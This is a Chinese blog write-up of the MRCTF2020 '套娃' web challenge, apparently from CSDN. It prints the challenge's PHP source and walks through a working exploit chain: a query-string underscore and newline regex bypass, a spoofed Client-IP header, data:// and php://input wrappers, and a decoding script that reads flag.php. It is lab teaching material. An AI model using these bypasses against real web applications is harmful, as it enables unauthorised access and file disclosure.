BUU [MRCTF2020]套娃

于 2024-03-19 19:27:53 发布
阅读量578 收藏 10
点赞数 5
分类专栏: CTF-web(零散wp合集) 文章标签: 网络安全 Web安全 BUU CTF PHP MRCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jayjay___/article/details/136852660
版权
文章讲述了在MRCTF2020比赛中的一个PHP编程挑战,涉及URL参数处理、JSFuck编码、IP限制以及加密解密技术,参与者需通过一系列逻辑分析和技巧绕过安全机制获取flag。
摘要由CSDN通过智能技术生成

BUU [MRCTF2020]套娃

开题,啥也没有。

image-20231203023850768

查看网页源代码发现后端源代码:

image-20231203023858011

<?php
//1st
$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}

首先是关于$_SERVER['QUERY_STRING']取值,例如: http://localhost/aaa/?p=222 ,``$SERVER[‘QUERY_STRING’] = “p=222”,相当于获取了所有GET传参相关的URL段。题目要求不包含`。这里用PHP的字符串解析特性:

PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:

  • 删除空白符
  • 将某些字符( [ 空格 + . )转换为下划线

正则匹配preg_match('/^23333$/', $_GET['b_u_p_t'])可以用%0a来绕过。

^ $界定了必须在同一行,否则匹配不到,直接利用%0a(换行符)进行绕过。

payload:

?b.u.p.t=23333%0a

image-20231203024657602

进入下一关secrettw.php,提示应该从本地local得到flag。

image-20231203024752367

源码中有jsfuck编码过的提示,控制台直接运行返回post me Merak

image-20231203024853991

随意POST一个Merak,返回源码:

<?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 


function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>

首先是IP地址需要是127.0.0.1,这里需要用client-ip头绕过,XFF头不行。

image-20231203025311672

然后是满足条件file_get_contents($_GET['2333']) === 'todat is a happy day'

以下两种方式均可。

2333=data://text/plain,todat is a happy day

2333=php://input
POST:todat is a happy day

最后是反写change($v)函数,使得file_get_contents(change($_GET['file']))语句可以成功包含flag.php文件。

反写脚本:

<?php
function unchange($v){ 
    $re = '';
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) - $i*2 ); 
    } 
    return $re; 
}
$real_flag = unchange('flag.php');
echo base64_encode($real_flag);
?>

得到ZmpdYSZmXGI=

最终payload:

/secrettw.php?2333=data://text/plain,todat is a happy day&file=ZmpdYSZmXGI=

flag在源码里。

image-20231203025712220

Jay 17
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF】[MRCTF2020]套娃
pofesser的博客
01-19 2976
思考 题目是套娃,感觉应该是一环一环的走下去,每个问题应该不是很难,按着他的提示做吧。 知识点 刷题 刷题的时候,习惯先查看robots.txt是否有敏感信息,然后查看源码。如果这个时候,都没有尝试爆目录了。 查看robots.txt无信息,查看源码。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/8d8ab23f032845a691d260644c24d003.png?x-oss-process=image/watermark,type_d3F5LXplbmhl
CTF——MISC习题讲解(MRCTF2020系列)
tlovejr的博客
03-08 4158
CTF——MISC习题讲解(MRCTF2020系列) 前言 上一章节我们已经做完一场比赛的杂项题目,这次给大家介绍一下MRCTF中杂项题目 一、[MRCTF2020]pyFlag 题目链接如下: 链接:https://pan.baidu.com/s/1IQWks6UXUFq5gbkpcGp9sw?pwd=t05h 提取码:t05h 首先打开题目后发现共有三张图片 老规矩,对于杂项的题目先扔到winhex或者010Editor工具进行查看 但是发现这几张图片的结尾处都是存在压缩包数据 第一张图片 第二张图
buuctf [MRCTF2020]套娃
m0_65766842的博客
04-08 219
第二个if要求get传的参不能等于2333且传的参结尾开头中间都是2333,在23333结尾加个换行符url编码为%0a 即可绕过。第一个if过滤了_和url编码的%5f 解码后也是_ ,PHP会将传参中的空格( )、小数点(.)自动替换成下划线。通过查询资料和对比,知道了这是一个jQuery事件,并且使用change()的办法来做题。简而言之就是变量改变会有提醒,因为我们绕过不能有提醒所以上传的v和file相同。通过查询资料,我们可以知道被注释的是一串jsfuck的的编码。我们进行传参之后得到以下代码。
BUU-WEB-[MRCTF2020]套娃
qq_24033605的博客
05-19 152
[MRCTF2020]套娃 查看源码,发现注释里有php审计内容。 //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET
[MRCTF2020]pyFlag
wangjin7356的博客
12-28 569
https://buuoj.cn/challenges#[MRCTF2020]pyFlag 用010Editor打开三张图片,发现每张末尾都有zip的数据 按照[Secret File Part 1:]Setsuna.jpg、[Secret File Part 2:]Furan.jpg、[Secret File Part 3:]Mikui.jpg的顺序将数据拼接起来 保存为zip文件 用ARCHPR破解 hint.txt 我用各种baseXX编码把flag套娃加密了,你应该也有看出来。 但我只用了一些
BUUCTF-MRCTF2020
Atkx's Blog
08-08 5367
目录标题Ezpop套娃 Ezpop 套娃 查看源码 $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t']))
BUUCTF:[MRCTF2020]千层套路
末初的CSDN博客
11-09 3409
https://buuoj.cn/challenges#[MRCTF2020]%E5%8D%83%E5%B1%82%E5%A5%97%E8%B7%AF 套娃题,拿脚本解压 import zipfile name = '0573' while True: fz = zipfile.ZipFile(name + '.zip', 'r') fz.extractall(pwd=bytes(name, 'utf-8')) name = fz.filelist[0].filename[0:
Buu-MRCTF
unexpectedthing的博客
10-27 191
文章目录Ez_bypass1Ez-pop你传你妈呢Pywebsite套娃EZauditEzpop_Reveng Ez_bypass1 打开环境,我们发现直接给了代码 整理过后: <?php $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5(
BUU----MIsc刷题记录
SopRomeo的博客
01-17 998
[GKCTF2020]Sail a boat down the river 视频有个二维码直接扫,扫出一个链接后,用油猴直接破解密钥 然后解数独… 解数独网站 根据提示是一行不是一列 解出来 52693795149137 得到密钥后 开始猜加密方式 解密,得到GG0kc.tf 然后压缩包里是一个乐谱文件 用overtrue 5 打开 ...
采区含断层工作面冲击失稳预测
04-19
本文以矿井西二采区某一工作面为工程背景,根据数值模拟峰前扰动时断层面应力、位移分叉趋势对断层冲击地压危险区域进行了初步划分,通过现场电磁辐射监测结果分析可知:预测的预警距离是工作面距断层35m时应当采取加强...
BUU 论坛的编辑器163Editor
09-21
BUU 论坛的编辑器DianUbb.rar
2020网鼎杯青龙组Boom
05-12
2020网鼎杯青龙组Boom。如果需要的可以下载,其实就是解方程而已,没啥难度。
2020年网鼎杯青龙组赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8295
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
ipywidgets-7.0.0a10.tar.gz
06-20
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
基于J2EE的B2C电子商务系统开发(论文模板+系统+开题报告+综述+任务书+答辩PPT+中期报表+外文文献+说明书).zip
06-20
标题中有的内容,压缩包中就有,适用于各位学子在完成大作业、课题、毕设时进行参考。 这些项目来自国内外大神提供,可以作为毕业设计的项目参考,也可以作为大作业项目参考,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。 注意:所有文件只提供参考作用,严禁抄袭、照搬
Pygments-2.3.1-py2.py3-none-any.whl
最新发布
06-20
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
buu cipher
10-23
Buu Cipher 是一种对称加密算法,也被称为布式密码。它是一种较为简单的加密算法,基于置换和替代的原理进行加密和解密。Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中的不同位置,增加了密文的复杂性。 其次,扩散步骤通过将每个字符替换为另一个字符来进一步混淆数据。此替换过程可以由算法中的扩散函数完成,该函数使用密钥和置换表来生成相应的替代字符。这样,明文中的每个字符都将被替换为不同的字符。 解密过程与加密过程相反。先使用相同的密钥和置换表进行扩散的逆向操作,将密文中的每个字符恢复为替代字符。然后使用相同的密钥和置换表进行混淆的逆向操作,恢复密文中字符的顺序,即可得到原始的明文。 尽管 Buu Cipher 是一种较为简单的加密算法,但它仍可以提供基本的保密性,以防止未授权者对加密数据的解读。然而,它的加密强度相对较低,可能容易受到密码分析方法的攻击。因此,在实际应用中,我们可能需要结合其他更为复杂和安全的加密算法来提高数据的保密性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Jay 17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值